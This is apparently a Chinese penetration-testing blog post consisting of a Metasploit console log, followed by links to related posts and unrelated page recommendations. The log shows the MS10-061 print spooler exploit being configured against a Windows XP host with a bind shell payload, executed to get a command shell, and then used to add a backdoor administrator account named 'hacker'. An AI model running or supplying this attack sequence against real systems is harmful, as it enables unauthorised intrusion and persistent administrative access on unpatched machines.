渗透杂记-2013-07-13 ms10_061_spoolss
- [*] Please wait while the Metasploit Pro Console initializes...
- [*] Starting Metasploit Console...
- MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
- MMMMMMMMMMM MMMMMMMMMM
- MMMN$ vMMMM
- MMMNl MMMMM MMMMM JMMMM
- MMMNl MMMMMMMN NMMMMMMM JMMMM
- MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
- MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
- MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
- MMMNI MMMMM MMMMMMM MMMMM jMMMM
- MMMNI MMMMM MMMMMMM MMMMM jMMMM
- MMMNI MMMNM MMMMMMM MMMMM jMMMM
- MMMNI WMMMM MMMMMMM MMMM# JMMMM
- MMMMR ?MMNM MMMMM .dMMMM
- MMMMNm `?MMM MMMM` dMMMMM
- MMMMMMN ?MM MM? NMMMMMN
- MMMMMMMMNe JMMMMMNMMM
- MMMMMMMMMMNm, eMMMMMNMMNMM
- MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
- MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
- =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
- + -- --=[ 840 exploits - 495 auxiliary - 146 post
- + -- --=[ 250 payloads - 27 encoders - 8 nops
- [*] Successfully loaded plugin: pro
- msf > search ms10_061
- Matching Modules
- ================
- Name Disclosure Date Rank Description
- ---- --------------- ---- -----------
- exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation
- Vulnerability
- msf > use exploit/windows/smb/ms10_061_spoolss
- msf exploit(ms10_061_spoolss) > info
- Name: Microsoft Print Spooler Service Impersonation Vulnerability
- Module: exploit/windows/smb/ms10_061_spoolss
- Version: 14976
- Platform: Windows
- Privileged: Yes
- License: Metasploit Framework License (BSD)
- Rank: Excellent
- Provided by:
- jduck <jduck@metasploit.com>
- hdm <hdm@metasploit.com>
- Available targets:
- Id Name
- -- ----
- 0 Windows Universal
- Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- PNAME no The printer share name to use on the target
- RHOST yes The target address
- RPORT 445 yes Set the SMB service port
- SMBPIPE spoolss no The named pipe for the spooler service
- Payload information:
- Space: 1024
- Avoid: 0 characters
- Description:
- This module exploits the RPC service impersonation vulnerability
- detailed in Microsoft Bulletin MS10-061. By making a specific DCE
- RPC request to the StartDocPrinter procedure, an attacker can
- impersonate the Printer Spooler service to create a file. The
- working directory at the time is %SystemRoot%\system32. An attacker
- can specify any file name, including directory traversal or full
- paths. By sending WritePrinter requests, an attacker can fully
- control the content of the created file. In order to gain code
- execution, this module writes to a directory used by Windows
- Management Instrumentation (WMI) to deploy applications. This
- directory (Wbem\Mof) is periodically scanned and any new .mof files
- are processed automatically. This is the same technique employed by
- the Stuxnet code found in the wild.
- References:
- http://www.osvdb.org/67988
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
- http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
- msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20
- RHOST => 142.168.2.20
- msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp
- PAYLOAD => windows/shell/bind_tcp
- msf exploit(ms10_061_spoolss) > info
- Name: Microsoft Print Spooler Service Impersonation Vulnerability
- Module: exploit/windows/smb/ms10_061_spoolss
- Version: 14976
- Platform: Windows
- Privileged: Yes
- License: Metasploit Framework License (BSD)
- Rank: Excellent
- Provided by:
- jduck <jduck@metasploit.com>
- hdm <hdm@metasploit.com>
- Available targets:
- Id Name
- -- ----
- 0 Windows Universal
- Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- PNAME no The printer share name to use on the target
- RHOST 142.168.2.20 yes The target address
- RPORT 445 yes Set the SMB service port
- SMBPIPE spoolss no The named pipe for the spooler service
- Payload information:
- Space: 1024
- Avoid: 0 characters
- Description:
- This module exploits the RPC service impersonation vulnerability
- detailed in Microsoft Bulletin MS10-061. By making a specific DCE
- RPC request to the StartDocPrinter procedure, an attacker can
- impersonate the Printer Spooler service to create a file. The
- working directory at the time is %SystemRoot%\system32. An attacker
- can specify any file name, including directory traversal or full
- paths. By sending WritePrinter requests, an attacker can fully
- control the content of the created file. In order to gain code
- execution, this module writes to a directory used by Windows
- Management Instrumentation (WMI) to deploy applications. This
- directory (Wbem\Mof) is periodically scanned and any new .mof files
- are processed automatically. This is the same technique employed by
- the Stuxnet code found in the wild.
- References:
- http://www.osvdb.org/67988
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
- http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
- msf exploit(ms10_061_spoolss) > exploit
- [*] Started bind handler
- [*] Trying target Windows Universal...
- [*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
- [*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
- [*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ...
- [*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61
- [*] Job started: 0x4
- [*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe
- [*] Job started: 0x5
- [*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof
- [*] Everything should be set, waiting for a session...
- [*] Sending stage (240 bytes) to 142.168.2.20
- Microsoft Windows XP [???? 5.1.2600]
- (C) ???????? 1985-2001 Microsoft Corp.
- C:\WINDOWS\system32>net user
- net user
- \\ ??????????
- -------------------------------------------------------------------------------
- Administrator Guest HelpAssistant
- IUSR_INTRA-PC IWAM_INTRA-PC shentouceshiwy
- SUPPORT_388945a0
- ????????????????????????????????????
- C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add
- net user hacker 123 /add & net localgroup administrators hacker /add
- ??????????????
- ??????????????
- C:\WINDOWS\system32>net user
- net user
- \\ ??????????
- -------------------------------------------------------------------------------
- Administrator Guest hacker
- HelpAssistant IUSR_INTRA-PC IWAM_INTRA-PC
- shentouceshiwy SUPPORT_388945a0
- ????????????????????????????????????
- C:\WINDOWS\system32>
渗透杂记-2013-07-13 ms10_061_spoolss的更多相关文章
- http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html
http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html
- http://www.ruanyifeng.com/blog/2013/07/gpg.html
http://www.ruanyifeng.com/blog/2013/07/gpg.html
- 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html
http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html
- <2013 07 31> 没有必然的理由
<2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...
- 渗透杂记-2013-07-13 关于SMB版本的扫描
smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...
- 渗透杂记-2013-07-13 windows/mssql/mssql_payload
扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...
- 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...
- <2013 07 06> "极路由" 与 “家庭服务器” 报道两则
跟我做!打造家庭服务器 很久没有更新了,因为之前托朋友帮我弄的mini PC终于到手了.阴差阳错地,原来只打算弄一台将就可用的低功耗下载机,结果到手的却是一台支持1080p(宣称,还没烧过),还带遥控 ...
- Cheatsheet: 2013 07.21 ~ 07.31
Mobile Android vs. iOS: Comparing the Development Process of the GQueues Mobile Apps Android Studio ...
随机推荐
- QT socket相关
#include<QtNetwork/QTcpSocket>#include<QtNetwork/QTcpServer> 1.服务器端 void About::init_tcp ...
- C#写入日志信息到文件中
为了在服务器上运行程序及时的跟踪出错的地方,可以在必要的地方加入写日志的程序. string folder = string.Format(@"D:\\{0}\\{1}", Dat ...
- xcode调整debug,release模式
今天调试的时候发现变量都不能查看了.在「lldb」中通过「po」命令来查看总是提示变量未找到. 环境 xcode 7, Swift 2 错误提示 ‘XXXX’ was compiled with op ...
- 使用HTTPS网站搭建iOS应用内测网站(OTA分发iOS应用)
为什么要搭建应用内测网站呢? 1.AppStore的审核速度比较慢,万一被拒,还得等,而且一旦发布,任何人都可以下载,而有些时候只有老板想知道最新的修改是否符合要求,万一不符合要求呢?又要修改了. 2 ...
- Web 服务器 low bandth DOS attack
https://www.owasp.org/images/0/04/Roberto_Suggi_Liverani_OWASPNZDAY2010-Defending_against_applicatio ...
- Navicat Premium相关注册码
--Navicat for SQL Server V10.0.10NAVD-3CG2-6KRN-IEPMNAVL-NIGY-6MYY-XWQENAVI-C3UU-AAGI-57FW --Navicat ...
- 如何在自己的代码中实现分享视频文件或者是图片文件到微信 QQ微博 新浪微博等!!!
首先在文档第一句我先自嘲下 , 我是大傻逼, 弄了两天微信是视频分享,一直被说为啥跟系统的相册分享的不一样,尼玛!!! 这里来说正文,我这里不像多少太多,大家都是程序猿,具体的阔以看代码. 搞代码之前 ...
- JavaSE基础第一篇
1.JDK的安装: 包括JRE 和JVM 下载地址: www.oracle.com/www.sun.com 2.环境变量 set path = "bin所在路径" 设置pa ...
- Android--RecyclerView的封装使用
1,用了很长一段时间的RecyclerView,在项目中用的频率也越来越频繁(因为踩得坑也越来越多了),或过头来看,感觉一直在写RecyclerView.Adapter中的三个方法和一个内部类,感觉很 ...
- Apache+Tomcat实现负载均衡
反向代理负载均衡 (Apache2+Tomcat7/8) 使用代理服务器可以将请求转发给内部的Web服务器,让代理服务器将请求均匀地转发给多台内部Web服务器之一上,从而达到负载均衡的目的.这种代理方 ...